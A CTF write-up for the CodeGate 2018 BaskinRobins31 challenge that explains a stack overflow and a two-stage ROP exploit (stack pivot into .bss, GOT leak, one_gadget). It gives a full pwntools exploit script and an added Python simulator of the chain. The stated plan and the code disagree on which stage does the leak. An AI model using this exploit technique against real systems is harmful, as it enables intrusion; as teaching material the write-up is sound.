CodeGate 2018 PWN BaskinRobins Write-up

Introduction

I am finally back from the Spring Festival vacation. Since Readme-revenge is not a typical example of a ROP attack, I will use the easiest challenge in CodeGate 2018 to demonstrate how a ROP attack works.

Vulnerability Analysis

The binary is not PIE and has no stack canary, so its code, GOT and .bss live at fixed addresses; only libc is randomized by ASLR, which is why the exploit still has to leak a libc address. Furthermore, there is an obvious stack buffer overflow in the function your_turn.

Exploit Plan

The exploit is divided into two parts: (1) leak the libc version by constructing a ROP chain that prints function pointers from the GOT; (2) construct a second ROP chain that calls read to overwrite a GOT function pointer with the address of a magic gadget (one_gadget) in the leaked libc. The first chain also overwrites the saved rbp with a .bss address (0x6020b8) and reads the second chain into the memory right after it (0x6020c0), so that the function epilogue's leave; ret pivots the stack onto the second chain.
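To make the stack pivot in this plan concrete, the following is an added example (not the write-up's code) that models the two chains with the write-up's addresses in a tiny x86-64 gadget simulator and shows the libc-base arithmetic. The binary is not on the page, so the gadget semantics are assumptions: 0x40087a is taken to be pop rdi; pop rsi; pop rdx; ret (the helper function), and 0x4008f4 is modelled as the read() call followed by the enclosing function's leave; ret epilogue, which is the minimal behaviour that lets the chain reach the second stage; 0x400bbb is left unmodelled and the simulator stops when it reaches it. The stack address and the sample leak value are constructed for the simulation.

```python
# Added example: models the BaskinRobins31 chain's leave;ret pivot into .bss
# and the libc-base arithmetic. Gadget semantics below are assumptions (the
# binary is not on the page); addresses are the write-up's.
import struct

POP_RDI_RSI_RDX = 0x40087a       # assumed: pop rdi; pop rsi; pop rdx; ret
READ_THEN_LEAVE_RET = 0x4008f4   # assumed: read(rdi, rsi, rdx); ...; leave; ret
NEXT_TARGET = 0x400bbb           # stage 2's return target; not modelled
FAKE_RBP = 0x6020b8              # value written over the saved rbp
STAGE2_ADDR = 0x6020c0           # where stage 1 reads stage 2 to
GOT_ENTRY = 0x602028             # GOT slot stage 2 targets
BUF_SIZE = 0xb0                  # bytes from the buffer to the saved rbp
STACK_BUF = 0x7fffffffe000       # constructed address of your_turn's buffer
READ_OFF_LIBC_2_23 = 0xf7250     # read() offset in Ubuntu 16.04 libc-2.23
ONE_GADGET_LIBC_2_23 = 0xf1147   # one-gadget offset in the same libc

def p64(v):
    return struct.pack("<Q", v)

def u64(b):
    return struct.unpack("<Q", b)[0]

def stage1():
    """Overflow: filler, fake saved rbp, then read(0, STAGE2_ADDR, 0x80)."""
    chain = [FAKE_RBP, POP_RDI_RSI_RDX, 0, STAGE2_ADDR, 0x80, READ_THEN_LEAVE_RET]
    return b"A" * BUF_SIZE + b"".join(p64(x) for x in chain)

def stage2():
    """Prefix of the second chain: pop (0, GOT_ENTRY, 8), return to NEXT_TARGET."""
    return b"".join(p64(x) for x in [POP_RDI_RSI_RDX, 0, GOT_ENTRY, 8, NEXT_TARGET])

class Cpu:
    """Just enough x86-64 to follow the chain: byte-addressed memory plus the
    registers the gadgets touch. Unwritten memory reads as zero."""

    def __init__(self):
        self.mem = {}
        self.rsp = self.rbp = 0
        self.rdi = self.rsi = self.rdx = 0
        self.stdin = b""
        self.trace = []  # every gadget hit, with the argument registers

    def write(self, addr, data):
        for i, b in enumerate(data):
            self.mem[addr + i] = b

    def pop(self):
        v = u64(bytes(self.mem.get(self.rsp + i, 0) for i in range(8)))
        self.rsp += 8
        return v

    def leave_ret(self):
        self.rsp = self.rbp      # leave: mov rsp, rbp
        self.rbp = self.pop()    #        pop rbp
        return self.pop()        # ret

    def run(self, pc):
        """Execute gadgets until pc is an address this model does not know."""
        while True:
            if pc == POP_RDI_RSI_RDX:
                self.rdi, self.rsi, self.rdx = self.pop(), self.pop(), self.pop()
                self.trace.append(("pop3", self.rdi, self.rsi, self.rdx))
                pc = self.pop()
            elif pc == READ_THEN_LEAVE_RET:
                n = min(self.rdx, len(self.stdin))   # read() into rsi from stdin
                self.write(self.rsi, self.stdin[:n])
                self.stdin = self.stdin[n:]
                self.trace.append(("read", self.rdi, self.rsi, n))
                pc = self.leave_ret()                # epilogue pivots to rbp
            else:
                return pc

def simulate(payload, second_stage):
    """Deliver the overflow, run your_turn's epilogue, and follow the chain."""
    cpu = Cpu()
    cpu.write(STACK_BUF, payload)
    cpu.rbp = STACK_BUF + BUF_SIZE   # your_turn's rbp: the saved-rbp slot
    cpu.stdin = second_stage         # what read() gets when stage 1 asks
    return cpu, cpu.run(cpu.leave_ret())

def libc_base(leaked_read):
    """libc base from a leaked read@got value; a base that is not page-aligned
    means the offset does not match the remote libc."""
    base = leaked_read - READ_OFF_LIBC_2_23
    if base & 0xfff:
        raise ValueError("libc base 0x%x not page-aligned: wrong offset" % base)
    return base

def one_gadget(leaked_read):
    return libc_base(leaked_read) + ONE_GADGET_LIBC_2_23

if __name__ == "__main__":
    cpu, pc = simulate(stage1(), stage2())
    for step in cpu.trace:
        print(step)
    print("stopped at 0x%x with rsp=0x%x" % (pc, cpu.rsp))
    print("one-gadget for leak 0x7ffff7af4250: 0x%x" % one_gadget(0x7ffff7af4250))
```

The trace shows the pivot as the exploit relies on it: the first pop gadget sets up read(0, 0x6020c0, 0x80), the read lands stage 2 at 0x6020c0, and the leave; ret then sets rsp to 0x6020b8, pops the (zero) word there into rbp and returns into stage 2's first gadget, which is why the fake rbp must sit exactly 8 bytes below the read target. The page-alignment check in libc_base is the cheapest way to catch a wrong libc offset before sending a one-gadget address that will just crash the target.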

Exploit

from pwn import *
import sys
import time

# Usage: python exploit.py <mode>   0 = remote, 1 = local, 2 = local under gdb
DEBUG = int(sys.argv[1])

if DEBUG == 0:
    r = remote("ch41l3ng3s.codegate.kr", 3131)
elif DEBUG == 1:
    r = process("./BaskinRobins31")
elif DEBUG == 2:
    r = process("./BaskinRobins31")
    gdb.attach(r, '''source ./script''')

def exploit():
    helper = 0x40087a          # pop rdi; pop rsi; pop rdx; ret, inside the binary's helper function
    junk = 0x424242424242
    payload = b"A" * 0xb0      # fill the buffer up to the saved rbp

    # Stage 1: fake saved rbp in .bss, then read(0, 0x6020c0, 0x80) to place
    # stage 2 right after it; the function's leave; ret then pivots onto it.
    payload += p64(0x6020b8)   # saved rbp -> .bss
    payload += p64(helper)     # return address
    payload += p64(0) + p64(0x6020c0) + p64(0x80) + p64(0x4008f4)   # read(0, 0x6020c0, 0x80)
    payload += p64(junk) * 20

    r.recvuntil(b"(1-3)")
    r.send(payload)

    time.sleep(2)
    # Stage 2, executed from 0x6020c0 after the pivot: rdi = 0, rsi = GOT entry
    # 0x602028, rdx = 8, then return to 0x400bbb.
    payload2 = p64(helper)
    payload2 += p64(0) + p64(0x602028) + p64(0x8) + p64(0x400bbb)
    payload2 += p64(0x6020c0) + p64(0x414141414141) * 4
    payload2 += p64(0x4008f4)
    r.send(payload2)

    r.recvuntil(b":(")
    r.recv(2)

    # Nine 8-byte values come back; the eighth is read's GOT entry.
    leaks = [u64(r.recv(8)) for _ in range(9)]
    for v in leaks[5:]:
        log.info("0x%x", v)

    libcBase = leaks[7] - 0xf7250    # offset of read in the target libc (libc-2.23, Ubuntu 16.04)
    log.info("Libc Base: 0x%x", libcBase)

    oneGadget = libcBase + 0xf1147   # one_gadget offset in the same libc
    payload3 = p64(oneGadget)        # 8 bytes: goes into the GOT slot via the stage-2 read
    r.send(payload3)

    r.interactive()

exploit()

Conclusion

This is not a difficult challenge, but it is a typical ROP one. Since Readme-revenge from 34C3 is more of a riddle, I use this challenge as my example of a ROP attack.

Categories: pwn
